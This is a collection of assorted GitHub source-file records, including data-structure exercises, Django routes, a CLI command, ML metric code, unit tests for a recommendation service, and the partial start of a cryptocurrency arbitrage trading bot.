Node({self.val}) -> {self.right}\"\n\n return f\"None <- Node({self.val}) ->None\"\n\ndef insert_node(head, data) :\n if head is None :\n head = Node(data)\n return head\n\n if head.val < data :\n head.right = insert_node(head.right, data)\n else :\n head.left = insert_node(head.left, data)\n\n return head\n\nif __name__ == \"__main__\":\n a = Node(1)\n a.left = Node(2)\n a.right = Node(7)\n\n print(insert_node(a, 10))\n print(insert_node(a, 6))","repo_name":"leolo0626/effective_python","sub_path":"algorithm/Recursion/insert_value_to_binary_search_tree.py","file_name":"insert_value_to_binary_search_tree.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17298203072","text":"import pickle\nfrom typing import Any\n\n\ndef load_pickle(path: str, **kwargs: Any) -> Any:\n with open(path, \"rb\") as f:\n return pickle.load(f, **kwargs) # noqa: S301\n\n\ndef write_pickle(pickle_serializable_object: Any, path: str, **kwargs: Any) -> None:\n with open(path, \"wb\") as f:\n pickle.dump(\n pickle_serializable_object, f, protocol=pickle.HIGHEST_PROTOCOL, **kwargs\n )\n","repo_name":"hetida/hetida-designer","sub_path":"runtime/hetdesrun/adapters/local_file/handlers/pickle.py","file_name":"pickle.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"78"} +{"seq_id":"10513600802","text":"import numpy as np\nimport random\n\n\nclass Agent(object):\n\n def __init__(self, name, env, learning, config):\n self.name = name\n self.env = env\n self.config = config\n self.learning = learning\n\n def choice_action(self, state):\n self.learning.check_state_exists(state)\n\n if np.random.uniform() < self.config.epsilon:\n state_action = self.learning.q_table[state, :]\n action_index = np.random.choice(np.where(state_action == np.max(state_action))[0])\n else:\n action_index = random.randint(0, self.env.n_actions - 1)\n action_name = self.env.action_space[action_index]\n\n return action_index, action_name\n","repo_name":"ppgdl/Reinforcement-Tutorial","sub_path":"utils/Maze/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3785219473","text":"# car/urls.py\nfrom django.conf.urls import url\n\nfrom .import views\n\nurlpatterns = [\n\n url(r'^dashboard/$', views.not_authorized, name='not_authorized'),\n url(r'^(?P[0-9]+)/$', views.car_detail, name='car_detail'),\n url(r'^car_maker/(?P[0-9]+)/$', views.car_maker_detail, name='maker_detail'),\n url(r'^car_list/$', views.car_list, name='car_list'),\n url(r'^car_maker_list/$', views.car_maker_list, name='maker_list'),\n]\n","repo_name":"diek/cars_project2","sub_path":"car/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23784207332","text":"\"\"\"CLI/Commands - Get an API token.\"\"\"\n\nimport click\n\nfrom ...core.api.user import get_user_brief\nfrom .. import decorators\nfrom ..exceptions import handle_api_exceptions\nfrom ..utils import maybe_spinner\nfrom .main import main\n\n\n@main.command()\n@decorators.common_cli_config_options\n@decorators.common_cli_output_options\n@decorators.common_api_auth_options\n@decorators.initialise_api\n@click.pass_context\ndef whoami(ctx, opts):\n \"\"\"Retrieve your current authentication status.\"\"\"\n click.echo(\"Retrieving your authentication status from the API ... \", nl=False)\n\n context_msg = \"Failed to retrieve your authentication status!\"\n with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg):\n with maybe_spinner(opts):\n is_auth, username, email, name = get_user_brief()\n click.secho(\"OK\", fg=\"green\")\n click.echo(\"You are authenticated as:\")\n if not is_auth:\n click.secho(\"Nobody (i.e. anonymous user)\", fg=\"yellow\")\n else:\n click.secho(\n \"%(name)s (slug: %(username)s\"\n % {\n \"name\": click.style(name, fg=\"cyan\"),\n \"username\": click.style(username, fg=\"magenta\"),\n },\n nl=False,\n )\n\n if email:\n click.secho(\n f\", email: {click.style(email, fg='green')}\",\n nl=False,\n )\n\n click.echo(\")\")\n","repo_name":"cloudsmith-io/cloudsmith-cli","sub_path":"cloudsmith_cli/cli/commands/whoami.py","file_name":"whoami.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"78"} +{"seq_id":"72281223613","text":"import pandas as pd\r\nimport numpy as np\r\nfrom mldm_hw1_02 import knn\r\n\r\n\r\ndef my_confusion_matrix(y_test, y_pred):\r\n matrix = np.zeros((10, 10))\r\n for i in range(len(y_test)):\r\n matrix[y_test[i]][y_pred[i]] += 1 # (real, predict)\r\n\r\n return matrix\r\n\r\n\r\ndef my_classification_report(cm, len):\r\n precision = []\r\n recall = []\r\n f1_score = []\r\n\r\n for i in range(0, len):\r\n tp = cm[i][i] # tp\r\n fn = np.sum(cm[i])-tp # fn\r\n fp = np.sum(cm[:, i])-tp # fp\r\n tn = np.sum(cm)-(tp+fn+fp) # tn\r\n\r\n precision.append(round(tp/(tp+fp), 2)) # precision list\r\n recall.append(round(tp/(tp+fn), 2)) # recall list\r\n f1_score.append(round(\r\n 2*precision[i]*recall[i]/(precision[i]+recall[i]), 2)) # f1_score list\r\n\r\n report = [precision, recall, f1_score]\r\n report = np.array(report)\r\n return report\r\n\r\n\r\n# open file\r\nwith open(\"digits_train.csv\", 'r') as trainfile:\r\n df = pd.read_csv(trainfile, names=[x for x in range(0, 785)])\r\nwith open(\"digits_test.csv\", 'r') as testfile:\r\n test = pd.read_csv(testfile, names=[x for x in range(0, 785)])\r\n\r\n# split label from data\r\nX = np.array(df.drop(0, axis=1).values)\r\ny = np.array(df[0].values)\r\n\r\nX_test = np.array(test.drop(0, axis=1).values)\r\ny_test = np.array(test[0].values)\r\n\r\n\r\nfit = knn.train(k=4, distance='euclidean', cv=0) # euclidean\r\n# fit = knn.KNNClassifier(k=4, distance='manhattan') # manhattan\r\n# fit = knn.KNNClassifier(k=4, distance='l_infinity') # L_infinity\r\ntrain = fit(X, y)\r\n\r\nprint(\"=\"*25, \"Test with Train Data\", \"=\"*25)\r\nscore, y_pred = knn.predict(X, y, train) # test the train data\r\n\r\ncm = my_confusion_matrix(y, y_pred) # confusion matrix\r\nreport = my_classification_report(cm, 10).transpose() # report\r\n\r\nreport = pd.DataFrame(report, columns=['Precision', 'Recall', 'F1-Score']) # change to data frame\r\n\r\nprint(\"\\nTrain Confusion Matrix \\n\", cm)\r\nprint(\"\\nTrain Report\\n\", report)\r\nprint(\"<>\"\r\n .format(score*100))\r\n\r\nprint(\"=\"*25, \"Test with Test Data\", \"=\"*25)\r\nscore, y_pred = knn.predict(X_test, y_test, train) # test the test data\r\n\r\ncm = my_confusion_matrix(y_test, y_pred) # confusion matrix\r\nreport = my_classification_report(cm, 10).transpose() # report\r\n\r\nreport = pd.DataFrame(report, columns=['Precision', 'Recall', 'F1-Score']) # change to data frame\r\n\r\nprint(\"\\nTest Confusion Matrix \\n\", cm)\r\nprint(\"\\nTest Report\\n\", report)\r\nprint(\"<>\"\r\n .format(score*100))\r\n","repo_name":"jaypae95/ml_dm","sub_path":"mldm_hw1/mldm_hw1_02/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2123681726","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndict = {\n 'unidade': [40,60,80,100,120,140,160],\n 'rendimento': [15.9,18.8,21.6,25.2,28.7,30.4,30.7]\n}\n\nx = dict['unidade']\ny = dict['rendimento']\n\nmatriz_corr = [x, y]\nrho = np.corrcoef(matriz_corr)\n\nx_log = []\ny_log = []\n\nfor i in range(len(x)):\n x_log.append(np.log(x[i]))\n y_log.append(np.log(y[i]))\n\nmatriz_corr_log = [x_log, y_log]\nrho_log = np.corrcoef(matriz_corr_log)\n\nprint(rho)\nprint(rho_log)\n\nplt.scatter(x, y)\nplt.show()\n\nplt.scatter(x_log, y_log)\nplt.show()","repo_name":"ThiagoMargoni/Senai-University-Files","sub_path":"2023.1/Data Science/Aula 5/Lista 4/ex03.py","file_name":"ex03.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"73148281853","text":"from tkinter import *\n\nwindow = Tk()\nwindow.title(\"Miles to Km Converter\")\nwindow.minsize(width=300, height=150)\nwindow.config(padx=30, pady=30)\n\ndef miles_to_km(miles):\n return miles * 1.609\n\ndef button_clicked():\n miles = float(miles_input.get())\n new_result = miles_to_km(miles)\n result_label.config(text=new_result)\n\n# Label \"is equal to\"\nequal_to_label = Label(text=\"is equal to\", font=(\"Verdana\"))\nequal_to_label.grid(column=0, row=1)\n\n# Label Result\nresult_label = Label(text=\"0\", font=(\"Verdana\"))\nresult_label.grid(column=1, row=1)\n\n# Label Km\nkm_label = Label(text=\"Km\", font=(\"Verdana\"))\nkm_label.grid(column=2, row=1)\n\n# Label Miles\nMiles_label = Label(text=\"Miles\", font=(\"Verdana\"))\nMiles_label.grid(column=2, row=0)\n\n# Button Calculate\ncalculate_button = Button(text=\"Calculate\", font=(\"Verdana\"), command=button_clicked)\ncalculate_button.grid(column=1, row=2)\n\n# Entry Miles\nmiles_input = Entry(width=7, font=(\"Verdana\"))\nmiles_input.grid(column=1, row=0)\n\n\nwindow.mainloop()","repo_name":"mathschagas/100DaysOfCode","sub_path":"Day 027/kilometers-converter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29009384315","text":"import pandas as pd\nimport numpy as np\nimport re\nimport string\nfrom nltk.stem.snowball import SnowballStemmer\nsnowball = SnowballStemmer('english')\n\n\ndef get_clean_lyrics(lyrics):\n '''\n get rid of all the unnecessary tags, symbols, line breaks, etc.\n returns a numpy array with the cleaned lyrics.\n\n '''\n #lower case\n clean = all_lyrics.str.lower()\n\n #reference to verse and chorus\n clean = clean.str.replace('chorus:','')\n clean = clean.str.replace('verse:','')\n\n #new line breaks\n clean = clean.str.replace('\\n', ' ')\n clean = clean.str.replace('\\r', ' ')\n\n #untranslated symbols\n clean = clean.str.replace('amp', ' ')\n clean = clean.str.replace('quot', ' ')\n\n #stuff like repeat 5x\n clean = clean.str.replace(r'[\\d]x','')\n\n #verse and chorus references\n clean = clean.str.replace(r'verse [\\d]','')\n\n #keep words whitespace and '\n clean = clean.str.replace(r'[^\\w\\s\\']','')\n\n clean = clean.str.replace(r'[\\d]','')\n\n return clean\n\n\ndef get_stop_words_list():\n '''\n Prepare a list of (stop)words to be removed from the cleaned lyrics.\n\n '''\n\n #use english, french, and spanish stop words\n stop_words_eng = get_stop_words('english')\n stop_words_fr = get_stop_words('french')\n stop_words_sp = get_stop_words('spanish')\n\n stop_words = stop_words_eng + stop_words_fr + stop_words_sp\n\n #compile a list of words that can be considered noise\n noise_words = [\n \"a\",\"an\", \"an'\", \"about\",\"above\",\"ain't\",\"ain\", \"aint\", \"all\",\"along\",\"also\",\"although\",\n \"am\",\"an\",\"any\",\"are\",\"aren't\", \"away\", \"as\",\"at\",\"ay\", \"back\", \"be\",\"because\",\n \"'cause\",\"cause\", \"bit\", \"been\",\"but\",\"by\",\"can\", \"can't\", \"cant\",\"cannot\",\"could\",\n \"couldn't\",\"come\",\"comes\",\"cause\", \"chorus\", \"did\",\"didn't\",\"do\", \"don\", \"does\",\n \"doesn't\",\"don't\", \"dont\", \"don'\", \"em'\",\"else\", \"e.g.\",\"either\",\"etc\",\"etc.\",\n \"even\",\"ever\",\"every\", \"for\",\"from\", \"further\",\"get\",\"gets\",\"give\", \"gives\",\n \"going\", \"goin'\", \"goes\", \"go\",\"gonna\", \"gotta\", \"got\",\"had\",\"hardly\",\"has\",\n \"hasn't\",\"having\",\"he\", \"hence\",\"her\",\"here\",\"hereby\",\"herein\", \"hereof\",\"hereon\",\n \"hereto\",\"herewith\",\"him\", \"his\",\"how\",\"however\",\"i\",\"i'll\", \"ill\",\n \"im'\",\"im\", \"i.e.\",\"if\",\"into\",\"it\",\"it's\",\"its\",\"just\", \"know\", \"ic\", \"lyricchecksum\",\n \"lyricid\", \"like\",\"let\", \"make\", \"me\",\"more\",\"most\", \"mr\",\"my\",\"near\",\"nor\",\"now\",\"of\",\n \"ok\",\"on\", \"one\",\"onto\",\"other\",\"our\",\"out\",\"over\",\"put\", \"really\", \"re\", \"said\",\n \"same\", \"say\", \"see\", \"she\",\"should\",\"shouldn't\",\"since\",\"so\",\"some\",\"such\",\"take\",\n \"than\",\"that\",\"thats\", \"that's\", \"the\",\"their\",\"them\",\"then\",\"there\",\"thereby\",\n \"therefore\",\"therefrom\",\"therein\", \"tell\", \"thereof\",\"thereon\",\"thereto\",\"therewith\",\n \"these\",\"they\",\"this\",\"those\",\"through\", \"thing\",\"try\", \"thus\",\"to\",\"too\",\"under\",\n \"until\",\"till'\", \"unto\",\"upon\",\"us\",\"very\",\"viz\", \"want\", \"was\", \"wasn't\", \"wanna\",\n \"whatcha\", \"way\", \"we\",\"went\",\"were\",\"what\",\"when\", \"where\",\"whereby\",\"wherein\",\n \"whether\",\"which\",\"while\", \"will\", \"well\", \"wit\", \"who\",\"whom\",\n \"whose\",\"why\",\"with\",\"without\",\"would\",\"x\", \"you\",\"your\",\"you're\", \"youre\", \"y'all\",\n \"verse\", \"repeat\", \"chorus\", \"oh\",\"ohh\",\"ooh\", \"ah\", \"ahh\", \"yeah\",\"yes\", \"u\", \"mmm\",\n \"uh\", \"hey\", \"la\", \"na\", \"yo\", \"ya\", \"yeh\", \"woah\",\"whoa\", \"huh\", \"woah\", \"yea\",\n \"doo\", \"de\", \"nah\", \"da\", \"ha\", \"ba\", \"wo\", \"wow\", \"woo\", \"ooo\", \"dee\", \"dum\",\n \"hmm\", \"ve\", \"ll\", \"t\", \"muhahahahahahaha\"\n ]\n\n remove_words = stop_words + noise_words\n remove_words = sorted(remove_words)\n\n return remove_words\n\n\nif __name__ == '__main__':\n\n d = path.dirname('/Users/Samaneh/Desktop/LyricsAnalyzer/')\n df = pd.DataFrame.from_csv(path.join(d, 'data/final_data.csv'), sep='\\t')\n song_list = df[['recording_id', 'year', 'genre_cluster', 'artist_name', 'track_name', 'lyrics_artist', 'lyrics_track', 'lyrics']]\n genres = np.array(song_list['genre_cluster'])\n\n all_lyrics = df['lyrics']\n clean_lyrics = get_clean_lyrics(all_lyrics)\n\n df_clean_lyrics = pd.DataFrame(get_clean_lyrics(all_lyrics))\n df_clean_lyrics.to_csv(path.join(d, 'data/clean_lyrics.csv'), sep='\\t', encoding='utf-8')\n","repo_name":"samsadi/lyrics_analyzer","sub_path":"code/clean_lyrics.py","file_name":"clean_lyrics.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37965766339","text":"\"\"\"\nRecommendation Test Suite\nTest cases can be run with the following:\nnosetests -v --with-spec --spec-color\n\"\"\"\n\nimport os\nimport json\nimport logging\nimport unittest\nfrom cloudant.client import Cloudant\nfrom time import sleep # use for rate limiting Cloudant Lite :(\nfrom service.models import Recommendation, DataValidationError\n\nVCAP_SERVICES = {\n 'cloudantNoSQLDB': [\n {'credentials': {\n 'username': 'admin',\n 'password': 'pass',\n 'host': '127.0.0.1',\n 'port': 5984,\n 'url': 'http://admin:pass@127.0.0.1:5984'\n }\n }\n ]\n}\n\n######################################################################\n# T E S T C A S E S\n######################################################################\nclass TestRecommendations(unittest.TestCase):\n\t\"\"\" Test Cases for Recommendation Model \"\"\"\n\tlogger = logging.getLogger(__name__)\n\n\tdef setUp(self):\n\t\tsleep(0.5)\n\t\tRecommendation.init_db()\n\t\tsleep(0.5)\n\t\tRecommendation.remove_all()\n\t\tsleep(0.5)\n\n\tdef test_db(self):\n\t\tRecommendation.database = None\n\t\tRecommendation.database = Recommendation.client.create_database('recommendations')\n\n\n\n\n\tdef test_create_a_recommendation(self):\n\t\trecommendation = Recommendation(1, \"productId\", \"suggestionId\", \"categoryId\")\n\t\tself.assertNotEqual(recommendation, None)\n\t\tself.assertEqual(recommendation.id, 1)\n\t\tself.assertEqual(recommendation.productId, \"productId\")\n\t\tself.assertEqual(recommendation.suggestionId, \"suggestionId\")\n\t\tself.assertEqual(recommendation.categoryId, \"categoryId\")\n\n\n\tdef test_delete_a_recommendation(self):\n\t\trecommendation = Recommendation(1, \"productId\", \"recommended\", \"categoryId\")\n\t\trecommendation.save()\n\t\tself.assertEqual(len(Recommendation.all()), 1)\n\t\trecommendation.delete()\n\t\tself.assertEqual(len(Recommendation.all()), 0)\n\n\tdef test_serialize_a_recommendation(self):\n\t\trecommendation = Recommendation(1,\"iPhone\", \"Pixel\", \"Digital Prodct\")\n\t\tdata = recommendation.serialize()\n\t\tself.assertNotEqual(data, None)\n\t\tself.assertNotIn('_id', data)\n\t\tself.assertEqual(data['id'], 1)\n\t\tself.assertEqual(data['productId'], \"iPhone\")\n\t\tself.assertEqual(data['suggestionId'], \"Pixel\")\n\t\tself.assertEqual(data['categoryId'], \"Digital Prodct\")\n\n\tdef test_deserialize_a_recommendation(self):\n\t\tdata = {\"id\": 1, \"productId\": \"iPhone\", \"suggestionId\": \"Pixel\", \"categoryId\": \"Digital Prodct\"}\n\t\trecommendation = Recommendation(id=data[\"id\"])\n\t\trecommendation.deserialize(data)\n\t\tself.assertNotEqual(recommendation, None)\n\t\tself.assertEqual(recommendation.id, 1)\n\t\tself.assertEqual(recommendation.productId, \"iPhone\")\n\t\tself.assertEqual(recommendation.suggestionId, \"Pixel\")\n\t\tself.assertEqual(recommendation.categoryId, \"Digital Prodct\")\n\n\tdef test_deserialize_with_no_productId(self):\n\t\t#recommendation = Recommendation()\n\t\tdata = {\"id\":1, \"suggestionId\": \"Pixel\", \"categoryId\": \"Digital Prodct\"}\n\t\trecommendation = Recommendation(id=data[\"id\"])\n\t\tself.assertRaises(DataValidationError, recommendation.deserialize, data)\n\n\tdef test_deserialize_with_no_data(self):\n\t\trecommendation = Recommendation(0)\n\t\tself.assertRaises(DataValidationError, recommendation.deserialize, None)\n\n\tdef test_deserialize_with_bad_data(self):\n\t\trecommendation = Recommendation(0)\n\t\tself.assertRaises(DataValidationError, recommendation.deserialize, \"string data\")\n\n\tdef test_find_a_recommendation(self):\n\t\tsaved_recommendation = Recommendation(1, \"productId\", \"recommended\", \"categoryId\")\n\t\tsaved_recommendation.save()\n\t\trecommendation = Recommendation.find(saved_recommendation.id)\n\t\tself.assertEqual(recommendation.productId, \"productId\")\n\t\tself.assertIsNot(recommendation, None)\n\t\tself.assertEqual(recommendation.id, saved_recommendation.id)\n\t\tself.assertEqual(recommendation.productId, \"productId\")\n\n\tdef test_update_a_recommendation(self):\n\t\trecommendation = Recommendation(1, \"productId\", \"recommended\", \"categoryId\")\n\t\trecommendation.save()\n\n\t\trecommendation.categoryId = \"newcategoryId\"\n\t\trecommendation.save()\n\t\trecommendations = Recommendation.all()\n\t\tself.assertEqual(recommendations[0].categoryId, \"newcategoryId\")\n\n\tdef test_find_by_categoryId(self):\n\t\tRecommendation(1,\"productId1\", \"recommended1\", \"categoryId1\").save()\n\t\tRecommendation(2, \"productId2\", \"recommended2\", \"categoryId2\").save()\n\t\trecommendations = Recommendation.find_by_categoryId(\"categoryId1\")\n\t\tself.assertEqual(len(recommendations), 1)\n\t\tself.assertEqual(recommendations[0].categoryId, \"categoryId1\")\n\n\tdef test_find_by_suggestionId(self):\n\t\tRecommendation(1, \"productId1\", \"suggestionId1\", \"categoryId1\").save()\n\t\tRecommendation(2, \"productId2\", \"suggestionId2\", \"categoryId2\").save()\n\t\trecommendations = Recommendation.find_by_suggestionId(\"suggestionId1\")\n\t\tself.assertEqual(len(recommendations), 1)\n\t\tself.assertEqual(recommendations[0].suggestionId, \"suggestionId1\")\n\n\tdef test_find_by_productId(self):\n\t\tRecommendation(1, \"productId1\", \"suggestionId1\", \"categoryId1\").save()\n\t\tRecommendation(2, \"productId2\", \"suggestionId2\", \"categoryId2\").save()\n\t\trecommendations = Recommendation.find_by_productId(\"productId1\")\n\t\tself.assertEqual(len(recommendations), 1)\n\t\tself.assertEqual(recommendations[0].productId, \"productId1\")\n\n\tdef test_init_db(self):\n\t\tRecommendation.init_db(\"recommendations\")\n\t\tself.assertIsNotNone(Recommendation.client)\t\n\n######################################################################\n# M A I N\n######################################################################\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"NYUDevOps-Fall18-Recommendations/recommendations","sub_path":"tests/test_recommendation.py","file_name":"test_recommendation.py","file_ext":"py","file_size_in_byte":5494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3563991186","text":"a = int(input())\nb = int(input())\nch = 0\nnech = 0\nn = a\nwhile (n >= a)and(n <= b)and(a <= 100)and(b <= 100):\n if n % 2 == 0:\n ch = ch + n\n n = n + 1\n else:\n nech = nech + n\n n = n + 1\n\n\nraz = ch - nech\n\nprint(raz)\n","repo_name":"MrFzovpec/olymp","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10475284314","text":"import copyreg\nimport getpass\nimport logging\nimport os\nimport pickle\nimport pprint\nimport time\nimport traceback\nimport uuid\n\nimport ccxt\nimport schedule\nimport yaml\n\nimport autotrageur.bot.arbitrage.arbseeker as arbseeker\nimport fp_libs.db.maria_db_handler as db_handler\nfrom autotrageur.bot.arbitrage.autotrageur import Autotrageur\nfrom autotrageur.bot.arbitrage.fcf.balance_checker import FCFBalanceChecker\nfrom autotrageur.bot.arbitrage.fcf.fcf_checkpoint import FCFCheckpoint\nfrom autotrageur.bot.arbitrage.fcf.fcf_checkpoint_utils import \\\n pickle_fcf_checkpoint\nfrom autotrageur.bot.arbitrage.fcf.fcf_stat_tracker import FCFStatTracker\nfrom autotrageur.bot.arbitrage.fcf.strategy import FCFStrategyBuilder\nfrom autotrageur.bot.common.config_constants import (TWILIO_RECIPIENT_NUMBERS,\n TWILIO_SENDER_NUMBER)\nfrom autotrageur.bot.common.db_constants import (FCF_AUTOTRAGEUR_CONFIG_COLUMNS,\n FCF_AUTOTRAGEUR_CONFIG_PRIM_KEY_ID,\n FCF_AUTOTRAGEUR_CONFIG_PRIM_KEY_START_TS,\n FCF_AUTOTRAGEUR_CONFIG_TABLE,\n FCF_MEASURES_PRIM_KEY_ID,\n FCF_MEASURES_TABLE,\n FCF_STATE_PRIM_KEY_ID,\n FCF_STATE_TABLE,\n FOREX_RATE_PRIM_KEY_ID,\n FOREX_RATE_TABLE,\n TRADE_OPPORTUNITY_PRIM_KEY_ID,\n TRADE_OPPORTUNITY_TABLE,\n TRADES_PRIM_KEY_SIDE,\n TRADES_PRIM_KEY_TRADE_OPP_ID,\n TRADES_TABLE)\nfrom autotrageur.bot.trader.ccxt_trader import CCXTTrader\nfrom autotrageur.bot.trader.dry_run import DryRunExchange\nfrom fp_libs.constants.ccxt_constants import API_KEY, API_SECRET, PASSWORD\nfrom fp_libs.constants.decimal_constants import TEN, ZERO\nfrom fp_libs.db.maria_db_handler import InsertRowObject\nfrom fp_libs.email_client.simple_email_client import send_all_emails\nfrom fp_libs.fiat_symbols import FIAT_SYMBOLS\nfrom fp_libs.logging.logging_utils import fancy_log\nfrom fp_libs.security.encryption import decrypt\nfrom fp_libs.twilio.twilio_client import TwilioClient\nfrom fp_libs.utilities import (keyfile_to_map, num_to_decimal, split_symbol,\n to_bytes, to_str)\n\n# Default error message for phone call.\nDEFAULT_PHONE_MESSAGE = \"Please check logs and e-mail for full stack trace.\"\n\n\nclass AutotrageurAuthenticationError(Exception):\n \"\"\"Incorrect credentials or exchange unavailable when attempting to\n communicate through an exchange's API.\"\"\"\n pass\n\n\nclass FCFAlertError(Exception):\n \"\"\"Error indicating that one or more methods of communication for `_alert`\n failed.\"\"\"\n pass\n\n\nclass IncompleteArbitrageError(Exception):\n \"\"\"Error indicating an uneven buy/sell base amount.\"\"\"\n pass\n\n\nclass InsufficientCryptoBalance(Exception):\n \"\"\"Thrown when there is not enough crypto balance to fulfill the matching\n sell order.\"\"\"\n pass\n\n\nclass IncorrectStateObjectTypeError(Exception):\n \"\"\"Raised when an incorrect object type is being used as the bot's\n state. For fcf_autotrageur, FCFCheckpoint is the required object type.\n \"\"\"\n pass\n\n\nclass FCFAutotrageur(Autotrageur):\n \"\"\"The fiat-crypto-fiat Autotrageur.\n\n This implementation of the Autotrageur polls two specified fiat to\n crypto markets. Given the target high and low spreads between the\n fiat currencies, this algorithm will execute a trade in the\n direction of exchange two (buy crypto on exchange one, sell crypto\n on exchange two) if the calculated spread is greater than the\n specified target high; vice versa if the calculated spread is less\n than the specified target low.\n \"\"\"\n def __load_twilio(self, twilio_cfg_path):\n \"\"\"Loads the Twilio configuration file and tests the connection to\n Twilio APIs.\n\n Args:\n twilio_cfg_path (str): Path to the Twilio configuration file.\n \"\"\"\n with open(twilio_cfg_path, 'r') as ymlfile:\n self.twilio_config = yaml.safe_load(ymlfile)\n\n self.twilio_client = TwilioClient(\n os.getenv('ACCOUNT_SID'), os.getenv('AUTH_TOKEN'), self.logger)\n\n # Make sure there is a valid connection as notifications are a critical\n # service to the bot.\n self.twilio_client.test_connection()\n\n def __parse_keyfile(self, keyfile_path, pi_mode=False):\n \"\"\"Parses the keyfile given in the arguments.\n\n Prompts user for a passphrase to decrypt the encrypted keyfile.\n\n Args:\n keyfile_path (str): The path to the keyfile.\n pi_mode (bool): Whether to decrypt with memory limitations to\n accommodate raspberry pi. Default is False.\n\n Raises:\n IOError: If the encrypted keyfile does not open, and not in\n dryrun mode.\n\n Returns:\n dict: Map of the keyfile contents, or None if dryrun and\n unavailable.\n \"\"\"\n try:\n pw = getpass.getpass(prompt=\"Enter keyfile password:\")\n with open(keyfile_path, \"rb\") as in_file:\n keys = decrypt(\n in_file.read(),\n to_bytes(pw),\n pi_mode=pi_mode)\n\n str_keys = to_str(keys)\n return keyfile_to_map(str_keys)\n except Exception:\n logging.error(\"Unable to load keyfile.\", exc_info=True)\n if not self._config.dryrun:\n raise IOError(\"Unable to open file: %s\" % keyfile_path)\n else:\n logging.info(\"**Dry run: continuing with program\")\n return None\n\n def __persist_config(self):\n \"\"\"Persists the configuration for this `fcf_autotrageur` run.\"\"\"\n fcf_autotrageur_config_row = db_handler.build_row(\n FCF_AUTOTRAGEUR_CONFIG_COLUMNS, self._config._asdict())\n config_row_obj = InsertRowObject(\n FCF_AUTOTRAGEUR_CONFIG_TABLE,\n fcf_autotrageur_config_row,\n (FCF_AUTOTRAGEUR_CONFIG_PRIM_KEY_ID,\n FCF_AUTOTRAGEUR_CONFIG_PRIM_KEY_START_TS))\n\n db_handler.insert_row(config_row_obj)\n db_handler.commit_all()\n\n def __persist_forex(self, trader):\n \"\"\"Persists the current forex data.\n\n NOTE: The trader's forex_id is updated here and is cached until\n the next update.\n\n Args:\n trader (CCXTTrader): The CCXTTrader to use.\n \"\"\"\n trader.forex_id = str(uuid.uuid4())\n row_data = {\n 'id': trader.forex_id,\n 'quote': trader.quote,\n 'rate': trader.forex_ratio,\n 'local_timestamp': int(time.time())\n }\n forex_row_obj = InsertRowObject(\n FOREX_RATE_TABLE,\n row_data,\n (FOREX_RATE_PRIM_KEY_ID,))\n db_handler.insert_row(forex_row_obj)\n db_handler.commit_all()\n\n def __update_forex(self, trader):\n \"\"\"Update the internally stored forex ratio and store in db.\n\n Args:\n trader (CCXTTrader): The CCXTTrader to use.\n \"\"\"\n trader.set_forex_ratio()\n self.__persist_forex(trader)\n\n def __persist_trade_data(self, buy_response, sell_response, trade_metadata):\n \"\"\"Persists data regarding the current trade into the database.\n\n If a trade has been executed, we add any necessary information (such as\n foreign key IDs) to the trade responses before saving to the database.\n\n Args:\n buy_response (dict): The autotrageur unified response from the\n executed buy trade. If a buy trade was unsuccessful, then\n buy_response is None.\n sell_response (dict): The autotrageur unified response from the\n executed sell trade. If a sell trade was unsuccessful, then\n sell_response is None.\n trade_metadata (TradeMetadata): The trade metadata prepared by the\n autotrageur strategy.\n \"\"\"\n # Persist the spread_opp.\n trade_opportunity_id = trade_metadata.spread_opp.id\n spread_opp = trade_metadata.spread_opp._asdict()\n trade_opp_row_obj = InsertRowObject(\n TRADE_OPPORTUNITY_TABLE,\n spread_opp,\n (TRADE_OPPORTUNITY_PRIM_KEY_ID, ))\n db_handler.insert_row(trade_opp_row_obj)\n\n # Persist the executed buy order, if available.\n if buy_response is not None:\n buy_response['trade_opportunity_id'] = trade_opportunity_id\n buy_response['autotrageur_config_id'] = self._config.id\n buy_response['autotrageur_config_start_timestamp'] = (\n self._config.start_timestamp)\n buy_trade_row_obj = InsertRowObject(\n TRADES_TABLE,\n buy_response,\n (TRADES_PRIM_KEY_TRADE_OPP_ID, TRADES_PRIM_KEY_SIDE))\n db_handler.insert_row(buy_trade_row_obj)\n\n # Persist the executed sell order, if available.\n if sell_response is not None:\n sell_response['trade_opportunity_id'] = trade_opportunity_id\n sell_response['autotrageur_config_id'] = self._config.id\n sell_response['autotrageur_config_start_timestamp'] = (\n self._config.start_timestamp)\n sell_trade_row_obj = InsertRowObject(\n TRADES_TABLE,\n sell_response,\n (TRADES_PRIM_KEY_TRADE_OPP_ID, TRADES_PRIM_KEY_SIDE))\n db_handler.insert_row(sell_trade_row_obj)\n\n db_handler.commit_all()\n\n def __construct_strategy(self):\n \"\"\"Initializes the Algorithm component.\"\"\"\n strategy_builder = FCFStrategyBuilder()\n return (strategy_builder\n .set_has_started(False)\n 